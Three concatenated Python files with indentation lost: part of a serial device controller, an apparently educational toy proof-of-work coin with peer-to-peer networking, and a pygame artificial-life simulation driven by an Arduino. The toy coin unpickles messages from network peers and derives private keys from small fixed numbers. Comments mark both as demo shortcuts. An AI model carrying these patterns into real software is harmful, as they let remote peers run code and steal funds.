self.sio_writer.write(self.encoder.encode(self.STREAM_VOLUME))
def stream_audio_off(self):
if self.sio_writer is None: return
self.sio_writer.write(self.encoder.encode(self.POLL_VOLUME))
def get_battery_level(self):
if self.sio_writer is None: return
self.sio_writer.write(self.encoder.encode(self.GET_BATTERY_LEVEL))
def upload_firmware_thd(self, filename, gui):
try:
bootloader = BootLoader(self.ser, self.ser, filename, gui)
except Exception as e:
traceback.print_exc()
gui.firmware_failure(str(e))
return
try:
bootloader.load()
if not bootloader.verify():
gui.firmware_failure("Firmware verification failed.")
return
bootloader.exit()
time.sleep(5)
gui.firmware_success()
except Exception as e:
traceback.print_exc()
gui.firmware_failure(str(e))
def upload_firmware(self, filename, gui):
self.internal_disconnect()
self.firmware_thd = threading.Thread(target=self.upload_firmware_thd, args=(filename, gui))
self.firmware_thd.start()
def upload_firmware_complete(self):
self.firmware_thd.join()
time.sleep(5)
self.internal_reconnect()
self.sio_writer.write(self.encoder.encode(self.GET_ALL_VALUES))
|
powcoin_four.py
|
"""
POWCoin Part 4
* Node.handle_block supports creation and extension of branches, but doesn't yet do reorgs
* Define Node.find_in_branch()
* Define Block.__eq__
* Fix how Tx.__repr__ handles genesis block
Usage:
powcoin_four.py serve
powcoin_four.py ping [--node <node>]
powcoin_four.py tx <from> <to> <amount> [--node <node>]
powcoin_four.py balance <name> [--node <node>]
Options:
-h --help Show this screen.
--node=<node> Hostname of node [default: node0]
"""
import uuid, socketserver, socket, sys, argparse, time, os, logging, threading, hashlib, random, re, pickle
from docopt import docopt
from copy import deepcopy
from ecdsa import SigningKey, SECP256k1
PORT = 10000
GET_BLOCKS_CHUNK = 10
BLOCK_SUBSIDY = 50
node = None
lock = threading.Lock()
logging.basicConfig(level="INFO", format='%(threadName)-6s | %(message)s')
logger = logging.getLogger(__name__)
def spend_message(tx, index):
outpoint = tx.tx_ins[index].outpoint
return serialize(outpoint) + serialize(tx.tx_outs)
class Tx:
def __init__(self, id, tx_ins, tx_outs):
self.id = id
self.tx_ins = tx_ins
self.tx_outs = tx_outs
def sign_input(self, index, private_key):
message = spend_message(self, index)
signature = private_key.sign(message)
self.tx_ins[index].signature = signature
def verify_input(self, index, public_key):
tx_in = self.tx_ins[index]
message = spend_message(self, index)
return public_key.verify(tx_in.signature, message)
@property
def is_coinbase(self):
return self.tx_ins[0].tx_id is None
def __eq__(self, other):
return self.id == other.id
class TxIn:
def __init__(self, tx_id, index, signature=None):
self.tx_id = tx_id
self.index = index
self.signature = signature
@property
def outpoint(self):
return (self.tx_id, self.index)
class TxOut:
def __init__(self, tx_id, index, amount, public_key):
self.tx_id = tx_id
self.index = index
self.amount = amount
self.public_key = public_key
@property
def outpoint(self):
return (self.tx_id, self.index)
class Block:
def __init__(self, txns, prev_id, nonce):
self.txns = txns
self.prev_id = prev_id
self.nonce = nonce
@property
def header(self):
return serialize(self)
@property
def id(self):
return hashlib.sha256(self.header).hexdigest()
@property
def proof(self):
return int(self.id, 16)
def __eq__(self, other):
# FIXME WTF it feels like I've defined this 50 times ...
return self.id == other.id
def __repr__(self):
prev_id = self.prev_id[:10] if self.prev_id else None
return f"Block(prev_id={prev_id}... id={self.id[:10]}...)"
class Node:
def __init__(self, address):
self.blocks = []
self.branches = []
self.utxo_set = {}
self.mempool = []
self.peers = []
self.pending_peers = []
self.address = address
def connect(self, peer):
if peer not in self.peers and peer != self.address:
logger.info(f'(handshake) Sent "connect" to {peer[0]}')
try:
send_message(peer, "connect", None)
self.pending_peers.append(peer)
except:
logger.info(f'(handshake) Node {peer[0]} offline')
def sync(self):
blocks = self.blocks[-GET_BLOCKS_CHUNK:]
block_ids = [block.id for block in blocks]
for peer in self.peers:
send_message(peer, "sync", block_ids)
def fetch_utxos(self, public_key):
return [tx_out for tx_out in self.utxo_set.values()
if tx_out.public_key == public_key]
def connect_tx(self, tx):
# Remove utxos that were just spent
if not tx.is_coinbase:
for tx_in in tx.tx_ins:
del self.utxo_set[tx_in.outpoint]
# Save utxos which were just created
for tx_out in tx.tx_outs:
self.utxo_set[tx_out.outpoint] = tx_out
# Clean up mempool
if tx in self.mempool:
self.mempool.remove(tx)
def fetch_balance(self, public_key):
# Fetch utxos associated with this public key
utxos = self.fetch_utxos(public_key)
# Sum the amounts
return sum([tx_out.amount for tx_out in utxos])
def validate_tx(self, tx):
in_sum = 0
out_sum = 0
for index, tx_in in enumerate(tx.tx_ins):
# TxIn spending an unspent output
assert tx_in.outpoint in self.utxo_set
# Grab the tx_out
tx_out = self.utxo_set[tx_in.outpoint]
# Verify signature using public key of TxOut we're spending
public_key = tx_out.public_key
tx.verify_input(index, public_key)
# Sum up the total inputs
amount = tx_out.amount
in_sum += amount
for tx_out in tx.tx_outs:
            # Sum up the total outputs
out_sum += tx_out.amount
# Check no value created or destroyed
assert in_sum == out_sum
def validate_coinbase(self, tx):
assert len(tx.tx_ins) == len(tx.tx_outs) == 1
assert tx.tx_outs[0].amount == BLOCK_SUBSIDY
def handle_tx(self, tx):
if tx not in self.mempool:
self.validate_tx(tx)
self.mempool.append(tx)
            # Propagate transaction
for peer in self.peers:
send_message(peer, "tx", tx)
def validate_block(self, block, validate_txns=False):
assert block.proof < POW_TARGET, "Insufficient Proof-of-Work"
if validate_txns:
# Validate coinbase separately
self.validate_coinbase(block.txns[0])
# Check the transactions are valid
for tx in block.txns[1:]:
self.validate_tx(tx)
def find_in_branch(self, block_id):
for branch_index, branch in enumerate(self.branches):
for height, block in enumerate(branch):
if block.id == block_id:
return branch, branch_index, height
return None, None, None
def handle_block(self, block):
# Look up previous block
branch, branch_index, height = self.find_in_branch(block.prev_id)
# Conditions
extends_chain = block.prev_id == self.blocks[-1].id
forks_chain = not extends_chain and \
not branch and \
block.prev_id in [block.id for block in self.blocks]
extends_branch = branch and height == len(branch) - 1
forks_branch = branch and height != len(branch) - 1
# Always validate, but only validate transactions if extending chain
self.validate_block(block, validate_txns=extends_chain)
# Handle each condition separately
if extends_chain:
self.connect_block(block)
logger.info(f"Extended chain to height {len(self.blocks)-1}")
elif forks_chain:
self.branches.append([block])
logger.info(f"Created branch {len(self.branches)-1}")
elif extends_branch:
branch.append(block)
# FIXME: reorg if this branch has more work than our main chain
logger.info(f"Extended branch {branch_index} to {len(branch)}")
elif forks_branch:
self.branches.append(branch[:height+1] + [block])
logger.info(f"Created branch {len(self.branches)-1} to height {len(self.branches[-1]) - 1}")
else:
raise Exception("Couldn't locate parent block")
        # Block propagation
for peer in self.peers:
disrupt(func=send_message, args=[peer, "blocks", [block]])
def connect_block(self, block):
# Add the block to our chain
self.blocks.append(block)
# If they're all good, update UTXO set / mempool
for tx in block.txns:
self.connect_tx(tx)
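# Hedged illustration (not from the original source) of the four cases that
# Node.handle_block distinguishes, assuming a main chain [A, B, C]:
#
#   extends_chain:  block.prev_id == C.id            -> append to self.blocks
#   forks_chain:    block.prev_id == A.id or B.id    -> new branch [block]
#   extends_branch: prev_id is the tip of a branch   -> append to that branch
#   forks_branch:   prev_id is inside a branch       -> branch prefix + [block]
#
# Reorgs (adopting a branch with more work than the main chain) are
# intentionally not handled yet -- see the FIXME in handle_block.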
def prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount):
sender_public_key = sender_private_key.get_verifying_key()
    # Construct tx.tx_ins
tx_ins = []
tx_in_sum = 0
for tx_out in utxos:
tx_ins.append(TxIn(tx_id=tx_out.tx_id, index=tx_out.index, signature=None))
tx_in_sum += tx_out.amount
if tx_in_sum > amount:
break
# Make sure sender can afford it
assert tx_in_sum >= amount
# Construct tx.tx_outs
tx_id = uuid.uuid4()
change = tx_in_sum - amount
tx_outs = [
TxOut(tx_id=tx_id, index=0, amount=amount, public_key=recipient_public_key),
TxOut(tx_id=tx_id, index=1, amount=change, public_key=sender_public_key),
]
# Construct tx and sign inputs
tx = Tx(id=tx_id, tx_ins=tx_ins, tx_outs=tx_outs)
for i in range(len(tx.tx_ins)):
tx.sign_input(i, sender_private_key)
return tx
def prepare_coinbase(public_key, tx_id=None):
if tx_id is None:
tx_id = uuid.uuid4()
return Tx(
id=tx_id,
tx_ins=[
TxIn(None, None, None),
],
tx_outs=[
TxOut(tx_id=tx_id, index=0, amount=BLOCK_SUBSIDY,
public_key=public_key),
],
)
##########
# Mining #
##########
DIFFICULTY_BITS = 15
POW_TARGET = 2 ** (256 - DIFFICULTY_BITS)
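# With DIFFICULTY_BITS = 15 a valid proof must fall below 2**241, so a miner needs
# roughly 2**15 (~33,000) nonce attempts per block on average -- small enough to
# mine in pure Python for this demo.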
mining_interrupt = threading.Event()
def mine_block(block):
while block.proof >= POW_TARGET:
# TODO: accept interrupts here if tip changes
if mining_interrupt.is_set():
logger.info("Mining interrupted")
mining_interrupt.clear()
return
block.nonce += 1
return block
def mine_forever(public_key):
logging.info("Starting miner")
while True:
coinbase = prepare_coinbase(public_key)
unmined_block = Block(
txns=[coinbase] + node.mempool,
prev_id=node.blocks[-1].id,
nonce=random.randint(0, 1000000000),
)
mined_block = mine_block(unmined_block)
if mined_block:
logger.info("")
logger.info("Mined a block")
with lock:
node.handle_block(mined_block)
def mine_genesis_block(node, public_key):
coinbase = prepare_coinbase(public_key, tx_id="abc123")
unmined_block = Block(txns=[coinbase], prev_id=None, nonce=0)
mined_block = mine_block(unmined_block)
node.blocks.append(mined_block)
node.connect_tx(coinbase)
return mined_block
##############
# Networking #
##############
def serialize(coin):
return pickle.dumps(coin)
def deserialize(serialized):
return pickle.loads(serialized)
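# NOTE: pickle keeps this demo compact, but unpickling data from untrusted peers is
# unsafe; a real protocol would use a restricted serializer (e.g. JSON with explicit
# schemas) instead.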
def read_message(s):
message = b''
# Our protocol is: first 4 bytes signify message length
raw_message_length = s.recv(4) or b"\x00"
message_length = int.from_bytes(raw_message_length, 'big')
while message_length > 0:
chunk = s.recv(1024)
message += chunk
message_length -= len(chunk)
return deserialize(message)
def prepare_message(command, data):
message = {
"command": command,
"data": data,
}
serialized_message = serialize(message)
length = len(serialized_message).to_bytes(4, 'big')
return length + serialized_message
def disrupt(func, args):
# Simulate packet loss
if random.randint(0, 10) != 0:
# Simulate network latency
threading.Timer(random.random(), func, args).start()
class TCPHandler(socketserver.BaseRequestHandler):
def get_canonical_peer_address(self):
ip = self.client_address[0]
try:
hostname = socket.gethostbyaddr(ip)
hostname = re.search(r"_(.*?)_", hostname[0]).group(1)
except:
hostname = ip
return (hostname, PORT)
def respond(self, command, data):
response = prepare_message(command, data)
return self.request.sendall(response)
def handle(self):
message = read_message(self.request)
command = message["command"]
data = message["data"]
peer = self.get_canonical_peer_address()
# Handshake / Authentication
if command == "connect":
if peer not in node.pending_peers and peer not in node.peers:
node.pending_peers.append(peer)
logger.info(f'(handshake) Accepted "connect" request from "{peer[0]}"')
send_message(peer, "connect-response", None)
elif command == "connect-response":
if peer in node.pending_peers and peer not in node.peers:
node.pending_peers.remove(peer)
node.peers.append(peer)
logger.info(f'(handshake) Connected to "{peer[0]}"')
send_message(peer, "connect-response", None)
# Request their peers
send_message(peer, "peers", None)
# else:
# assert peer in node.peers, \
# f"Rejecting {command} from unconnected {peer[0]}"
# Business Logic
if command == "peers":
send_message(peer, "peers-response", node.peers)
if command == "peers-response":
for peer in data:
node.connect(peer)
if command == "ping":
self.respond(command="pong", data="")
if command == "sync":
# Find our most recent block that the peer doesn't know about,
# but which builds off a block they do know about.
peer_block_ids = data
for block in node.blocks[::-1]:
if block.id not in peer_block_ids \
and block.prev_id in peer_block_ids:
height = node.blocks.index(block)
blocks = node.blocks[height:height+GET_BLOCKS_CHUNK]
send_message(peer, "blocks", blocks)
logger.info('Served "sync" request')
return
logger.info('Could not serve "sync" request')
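# The "sync" branch above is a minimal initial block download: the requesting peer
# sends the block ids it already has, and we answer with up to GET_BLOCKS_CHUNK of
# our blocks starting from the first one that extends their chain.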
if command == "blocks":
for block in data:
try:
with lock:
node.handle_block(block)
mining_interrupt.set()
except:
logger.info("Rejected block")
if len(data) == GET_BLOCKS_CHUNK:
node.sync()
if command == "tx":
node.handle_tx(data)
if command == "balance":
balance = node.fetch_balance(data)
self.respond(command="balance-response", data=balance)
if command == "utxos":
utxos = node.fetch_utxos(data)
self.respond(command="utxos-response", data=utxos)
def external_address(node):
i = int(node[-1])
port = PORT + i
return ('localhost', port)
def serve():
logger.info("Starting server")
server = socketserver.TCPServer(("0.0.0.0", PORT), TCPHandler)
server.serve_forever()
def send_message(address, command, data, response=False):
message = prepare_message(command, data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(address)
s.sendall(message)
if response:
return read_message(s)
#######
# CLI #
#######
def lookup_private_key(name):
exponent = {
"alice": 1, "bob": 2, "node0": 3, "node1": 4, "node2": 5
}[name]
return SigningKey.from_secret_exponent(exponent, curve=SECP256k1)
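# These fixed secret exponents only give the demo identities deterministic keys;
# real private keys must never be derived from small hard-coded exponents.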
def lookup_public_key(name):
return lookup_private_key(name).get_verifying_key()
def main(args):
if args["serve"]:
threading.current_thread().name = "main"
name = os.environ["NAME"]
duration = 10 * ["node0", "node1", "node2"].index(name)
time.sleep(duration)
global node
node = Node(address=(name, PORT))
# Alice is Satoshi!
mine_genesis_block(node, lookup_public_key("alice"))
# Start server thread
server_thread = threading.Thread(target=serve, name="server")
server_thread.start()
# Join the network
peers = [(p, PORT) for p in os.environ['PEERS'].split(',')]
for peer in peers:
node.connect(peer)
# Wait for peer connections
time.sleep(1)
# Do initial block download
node.sync()
# Wait for IBD to finish
time.sleep(1)
# Start miner thread
miner_public_key = lookup_public_key(name)
miner_thread = threading.Thread(target=mine_forever,
args=[miner_public_key], name="miner")
miner_thread.start()
elif args["ping"]:
address = external_address(args["--node"])
send_message(address, "ping", "")
elif args["balance"]:
public_key = lookup_public_key(args["<name>"])
address = external_address(args["--node"])
response = send_message(address, "balance", public_key, response=True)
print(response["data"])
elif args["tx"]:
# Grab parameters
sender_private_key = lookup_private_key(args["<from>"])
sender_public_key = sender_private_key.get_verifying_key()
recipient_private_key = lookup_private_key(args["<to>"])
recipient_public_key = recipient_private_key.get_verifying_key()
amount = int(args["<amount>"])
address = external_address(args["--node"])
# Fetch utxos available to spend
response = send_message(address, "utxos", sender_public_key, response=True)
utxos = response["data"]
# Prepare transaction
tx = prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount)
# send to node
send_message(address, "tx", tx)
else:
print("Invalid command")
if __name__ == '__main__':
main(docopt(__doc__))
|
lifebox-test.py
|
import pygame
import sys
import random
import threading
import time
from pyfirmata import ArduinoMega, util
datafromfile = [0] * 21
def map(x,in_min,in_max,out_min,out_max):
return float((float(x) - float(in_min)) * (float(out_max) - float(out_min)) / (float(in_max) - float(in_min)) + float(out_min))
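# Linear rescale from one range to another, e.g. map(500, 0, 1000, 1, 2000) ~= 1000.5.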
def readdatafromfile(stop):
global datafromfile
while not stop:
file = open("/var/www/html/lifeboxdata", "r")
datafromfile = file.read().split("|")
#print (datafromfile[2])
time.sleep(2)
def readdatafromArduino(stop):
global datafromfile
# load default values from the data file
file = open("/var/www/html/lifeboxdata", "r")
datafromfile = file.read().split("|")
# remove
board = ArduinoMega('/dev/ttyACM0')
it = util.Iterator(board)
it.start()
for i in range (0,11):
board.analog[i].enable_reporting()
while not stop:
#for i in range (0,11):
#if board.analog[i].read() is not None:
#print("Pin:"+str(i)+" Value:"+str(int(board.analog[i].read()*1000)))
if board.analog[i].read() is not None:
#datafromfile[16] = board.analog[8].read() # plants life expectancy
#datafromfile[20] = board.analog[10].read() # plants energy generation
print("Value:"+str(int(board.analog[9].read()*1000)))
datafromfile[17] = int(map(int(board.analog[9].read()*1000),0,1000,1,2000)) # plants nearborn chances
print ("Return:" +str(datafromfile[17]))
#datafromfile[6] = board.analog[3].read() # sp1 gathering
#datafromfile[5] = board.analog[2].read() # sp1 efficency
#datafromfile[0] = board.analog[0].read() # sp1 life exp
#datafromfile[1] = board.analog[1].read() # sp1 nearborn chances
#datafromfile[14] = board.analog[7].read() # sp2 gathering
#datafromfile[13] = board.analog[6].read() # sp2 efficency
#datafromfile[8] = board.analog[4].read() # sp2 life exp
#datafromfile[9] = board.analog[5].read() # sp2 nearborn chances
time.sleep(1)
graph_mode = 0 # show graphs
real_mode = 1 # respawn control
app_mode = 0 # via web / app or manual controller
gradient_mode = 1 # individual fade in / out linked to energy
fullscreen_mode = 0
fullscreen_graph = 0
rf = 1 # reduction factor
# run thread
stop = False
if app_mode == 0:
t = threading.Thread(target=readdatafromArduino,args=(stop,))
else:
t = threading.Thread(target=readdatafromfile,args=(stop,))
t.daemon = True
t.start()
#pygame setup
pygame.init()
pygame.font.init()
pygame.display.set_caption('LifeBox')
if fullscreen_mode == 0:
screen = pygame.display.set_mode((1000,600))
x_array = 32
y_array = 32
circle_size = 5
else:
# size for full HD screen (1920,1080)
# if you have another screen size, you need to change x_array, y_array and circle_size
screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)
x_array = 70
y_array = 52
circle_size = 7
textfont = pygame.font.SysFont('arial',30)
# colors
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
bluegraph = (0,0,255,50)
yellow = (255,255,0)
yellowgraph = (255,255,0,50)
magenta = (255,0,255)
white = (255,255,255)
whitegraph = (255,255,255,50)
midgrey = (128,128,128)
black = (0,0,0)
darkgrey = (30,30,30)
lightgrey = (200,200,200,50)
# fps management
clock = pygame.time.Clock()
# species matrix
t, w, h = 3,x_array, y_array
# age 0 at z
# energy 1 at z
specie1 = [[[0 for x in range(t)] for y in range(h)] for z in range(w)]
specie2 = [[[0 for x in range(t)] for y in range(h)] for z in range(w)]
plants = [[[0 for x in range(t)] for y in range(h)] for z in range(w)]
# mask
#for x in range(0,10):
# for y in range(0,10):
# specie1[x][y][2] = 1
# specie2[x][y][2] = 1
# plants[x][y][2] = 1
# [x][y] [0]:age [1]:energy [2]:mask
# graph arrays
specie1_Iarray = [0 for x in range(200)]
specie2_Iarray = [0 for x in range(200)]
plants_Iarray = [0 for x in range(200)]
specie1_Earray = [0 for x in range(200)]
specie2_Earray = [0 for x in range(200)]
plants_Earray = [0 for x in range(200)]
# species variables
PLANTS_LIFE_EXPECTANCY = 40
PLANTS_RANDOM_BORN_CHANCES = 5100 # fixed
PLANTS_NEARBORN_CHANCES = 150
PLANTS_RANDOM_DIE_CHANCES = 2 # not used
PLANTS_ENERGY_BASE_PER_CYCLE = 100
# Each mana individual generates a defined amount of energy per cycle. This energy is gathered by the species. Low energy generation means a poor environment for the species to survive, and high energy generation a rich one.
#yellow
SPECIE1_LIFE_EXPECTANCY = 40
# Life expectancy is a statistical measure of the average time an organism is expected to live. Once a pixelic entity becomes stable, life expectancy determines how many iterations the pixel survives.
SPECIE1_RANDOM_BORN_CHANCES = 5100
# Fixed
# Parthenogenesis is a rare trait among species which allows them to reproduce without mating. The species inside LifeBox! can reproduce in a similar way; when they achieve it, offspring are randomly placed inside the grid.
# Setting this variable to a high value means fewer chances to reproduce that way; reducing the value makes parthenogenesis more likely to happen.
SPECIE1_NEARBORN_CHANCES = 25
# When two pixelic entities of the same species are adjacent to each other, they can reproduce. This variable determines the reproduction chances, so a higher value means higher chances to survive.
SPECIE1_RANDOM_DIE_CHANCES = 2
# NOT USED
# As in real life, LifeBox! pixelic species can die before reaching their life expectancy. Setting a low value will allow pixelic entities to reach their expected lifetime, while a higher value will seriously reduce their chances of surviving until the expected average lifetime.
SPECIE1_ENERGY_BASE = 250
# NOT USED
# Every species has a defined base level of energy when it is born; this base level conditions its chances of survival at the very first stages of its life.
SPECIE1_ENERGY_NEEDED_PER_CYCLE = 50
# This parameter defines the species' energy consumption at each iteration. Higher values mean that the species needs more energy per iteration cycle, meaning less efficiency.
SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE = 100
# As the previous parameter defines the efficiency of energy consumption, this one defines the efficiency of energy gathering from the mana. Higher values mean more gathering efficiency.
SPECIE1_ENERGY_TO_REPLICATE = 150
# NOT USED
# To allow species replication, each individual needs to exceed an energy threshold, the minimum amount of energy needed to be able to reproduce itself. Higher values mean a higher threshold.
#blue
SPECIE2_LIFE_EXPECTANCY = 40
SPECIE2_RANDOM_BORN_CHANCES = 5100 # fixed
SPECIE2_NEARBORN_CHANCES = 30
SPECIE2_RANDOM_DIE_CHANCES = 2 # not used
SPECIE2_ENERGY_BASE = 250 # not used
SPECIE2_ENERGY_NEEDED_PER_CYCLE = 50
SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE = 100
SPECIE2_ENERGY_TO_REPLICATE = 150 # not used
specie2_individuals = 0
specie1_individuals = 0
plants_individuals = 0
# screen for transparent graph
graphsurface = pygame.Surface((1920, 1080), pygame.SRCALPHA, 32)
while True:
print (datafromfile[17])
msElapsed = clock.tick(20)
for event in pygame.event.get():
if event.type == pygame.QUIT:
stop = True
pygame.quit()
sys.exit()
# init totals
plants_last_individuals = plants_individuals
specie2_last_individuals = specie2_individuals
specie1_last_individuals = specie1_individuals
specie2_individuals = 0
specie1_individuals = 0
plants_individuals = 0
specie2_energy = 0
specie1_energy = 0
plants_energy = 0
screen.fill(black)
for x in range(0,x_array):
# adjacent coordinates
xp = (x+1)
if xp >= x_array:
xp = x_array - 1
xm = (x-1)
if xm < 0:
xm = 0
for y in range(0,y_array):
# calculations
# adjacent coordinates
yp = (y+1)
if yp >= y_array:
yp = y_array - 1
ym = (y-1)
if ym < 0:
ym = 0
# count the number of currently live neighbouring cells
plants_neighbours = 0
specie1_neighbours = 0
specie2_neighbours = 0
# [Plants]
if plants[x][y][0] == 0 and plants[xm][y][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xp][y][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xm][ym][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[x][ym][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xp][ym][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xm][yp][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[x][yp][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xp][yp][0] > 0:
plants_neighbours += 1
# [Specie1]
if specie1[x][y][0] == 0 and specie1[xm][y][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xp][y][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xm][ym][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[x][ym][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xp][ym][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xm][yp][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[x][yp][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xp][yp][0] > 0:
specie1_neighbours += 1
# [Specie2]
if specie2[x][y][0] == 0 and specie2[xm][y][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xp][y][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xm][ym][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[x][ym][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xp][ym][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xm][yp][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[x][yp][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xp][yp][0] > 0:
specie2_neighbours += 1
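# The three *_neighbours counters above tally live cells in the 8-cell Moore
# neighbourhood; coordinates are clamped at the grid edges rather than wrapped.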
# [plants logic]
# if old, plant dies
if plants[x][y][0] >= PLANTS_LIFE_EXPECTANCY + int(datafromfile[16]):
plants[x][y][0] = 0
plants[x][y][1] = 0
# if no energy, plant dies
if plants[x][y][0] > 0 and plants[x][y][0] < PLANTS_LIFE_EXPECTANCY + int(datafromfile[16]) and plants[x][y][1] <= 0:
plants[x][y][0] = 0
plants[x][y][1] = 0
# plant grows
if plants[x][y][0]>0 and plants[x][y][0] < PLANTS_LIFE_EXPECTANCY + int(datafromfile[16]):
plants[x][y][0] += 1
plants[x][y][1] = plants[x][y][1] + PLANTS_ENERGY_BASE_PER_CYCLE + int(datafromfile[20])
plants_individuals += 1
plants_energy += plants[x][y][1]
# plant reproduction
if int(datafromfile[17]) > 0 and plants[x][y][0] == 0 and plants_neighbours > 0 and plants[x][y][2] == 0:
if PLANTS_NEARBORN_CHANCES - int(datafromfile[17]) < 2:
randomborn = 2
else:
randomborn = PLANTS_NEARBORN_CHANCES - int(datafromfile[17])
random_number = random.randint(1,randomborn)
if random_number == 1:
plants[x][y][0] = 1
plants[x][y][1] = PLANTS_ENERGY_BASE_PER_CYCLE + int(datafromfile[20])
plants_individuals += 1
plants_energy += plants[x][y][1]
# spontaneous generation
if int(plants[x][y][0] == 0) and plants_neighbours == 0 and plants[x][y][2] == 0 and ((plants_last_individuals == 0 and plants_individuals == 0 and real_mode == 1) or real_mode == 0):
random_number = random.randint(1,PLANTS_RANDOM_BORN_CHANCES)
if random_number == 1:
plants[x][y][0] = 1
plants[x][y][1] = PLANTS_ENERGY_BASE_PER_CYCLE + int(datafromfile[20])
plants_individuals += 1
plants_energy += plants[x][y][1]
# [specie1 logic]
# individual alive
if specie1[x][y][0] > 0:
#print "("+str(x)+","+str(y)+") is alive"
# try to eat
if plants[x][y][1] > 0:
total_energy=0
if plants[x][y][1] > SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[6]):
total_energy = SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[6])
plants[x][y][1] = plants[x][y][1] - (SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[6]))
else:
total_energy = plants[x][y][1]
plants[x][y][1] = 0
specie1[x][y][1] = specie1[x][y][1] + total_energy
#print "("+str(x)+","+str(y)+") eats"
# grow and decrease energy
specie1[x][y][0] += 1
specie1[x][y][1] = specie1[x][y][1] - (SPECIE1_ENERGY_NEEDED_PER_CYCLE + int(datafromfile[5]))
#print "("+str(x)+","+str(y)+") grows"
# die if no energy
if specie1[x][y][1] < 0:
specie1[x][y][1] = 0
specie1[x][y][0] = 0
#print "("+str(x)+","+str(y)+") dies"
# try to replicate
if specie1[x][y][1] > SPECIE1_ENERGY_TO_REPLICATE and specie1[x][y][2] == 0:
available_spots = [0 for numspots in range(8)]
pos=0
if int(datafromfile[1]) > 0:
if SPECIE1_NEARBORN_CHANCES - int(datafromfile[1]) < 2:
randomborn = 2
else:
randomborn = SPECIE1_NEARBORN_CHANCES - int(datafromfile[1])
random_number = random.randint(1,randomborn)
if specie1[xm][y][0] == 0:
available_spots[pos] = 1
pos += 1
if specie1[xp][y][0] == 0:
available_spots[pos] = 2
pos += 1
if specie1[xm][ym][0] == 0:
available_spots[pos] = 3
pos += 1
if specie1[x][ym][0] == 0:
available_spots[pos] = 4
pos += 1
if specie1[xp][ym][0] == 0:
available_spots[pos] = 5
pos += 1
if specie1[xm][yp][0] == 0:
available_spots[pos] = 6
pos += 1
if specie1[x][yp][0] == 0:
available_spots[pos] = 7
pos += 1
if specie1[xp][yp][0] == 0:
available_spots[pos] = 8
pos += 1
if pos > 0:
rand_pos=random.randint(0,pos-1)
if random_number == 1:
#print "ready to reproduce at ("+str(xm)+","+str(ym)+") - ("+str(xp)+","+str(yp)+") - center ("+str(x)+","+str(y)+")"
if available_spots[rand_pos] == 1:
specie1[xm][y][0] = 1
specie1[xm][y][1] = SPECIE1_ENERGY_BASE
#print "("+str(xm)+","+str(y)+") born"
if available_spots[rand_pos] == 2:
specie1[xp][y][0] = 1
specie1[xp][y][1] = SPECIE1_ENERGY_BASE
#print "("+str(xp)+","+str(y)+") born"
if available_spots[rand_pos] == 3:
specie1[xm][ym][0] = 1
specie1[xm][ym][1] = SPECIE1_ENERGY_BASE
#print "("+str(xm)+","+str(ym)+") born"
if available_spots[rand_pos] == 4:
specie1[x][ym][0] = 1
specie1[x][ym][1] = SPECIE1_ENERGY_BASE
#print "("+str(x)+","+str(ym)+") born"
if available_spots[rand_pos] == 5:
specie1[xp][ym][0] = 1
specie1[xp][ym][1] = SPECIE1_ENERGY_BASE
#print "("+str(xp)+","+str(ym)+") born"
if available_spots[rand_pos] == 6:
specie1[xm][yp][0] = 1
specie1[xm][yp][1] = SPECIE1_ENERGY_BASE
#print "("+str(xm)+","+str(yp)+") born"
if available_spots[rand_pos] == 7:
specie1[x][yp][0] = 1
specie1[x][yp][1] = SPECIE1_ENERGY_BASE
#print "("+str(x)+","+str(yp)+") born"
if available_spots[rand_pos] == 8:
specie1[xp][yp][0] = 1
specie1[xp][yp][1] = SPECIE1_ENERGY_BASE
#print "("+str(xp)+","+str(yp)+") born"
#print "end of reproduction"
# die if too old
if specie1[x][y][0] > SPECIE1_LIFE_EXPECTANCY + int(datafromfile[0]):
specie1[x][y][1] = 0
specie1[x][y][0] = 0
#print "("+str(x)+","+str(y)+") dies"
specie1_individuals += 1
specie1_energy += specie1[x][y][1]
# if no individual is alive, random born to avoid extinction
if specie1[x][y][0] == 0 and specie1_neighbours==0 and specie1[x][y][2] == 0 and ((specie1_last_individuals == 0 and specie1_individuals == 0 and real_mode == 1) or real_mode == 0):
random_number = random.randint(1,SPECIE1_RANDOM_BORN_CHANCES)
if random_number==1:
specie1[x][y][0] = 1
specie1[x][y][1] = SPECIE1_ENERGY_BASE
#print "("+str(x)+","+str(y)+") random born"
specie1_individuals += 1
specie1_energy += specie1[x][y][1]
# [species 2 logic]
# individual alive
if specie2[x][y][0] > 0:
# try to eat
if plants[x][y][1] > 0:
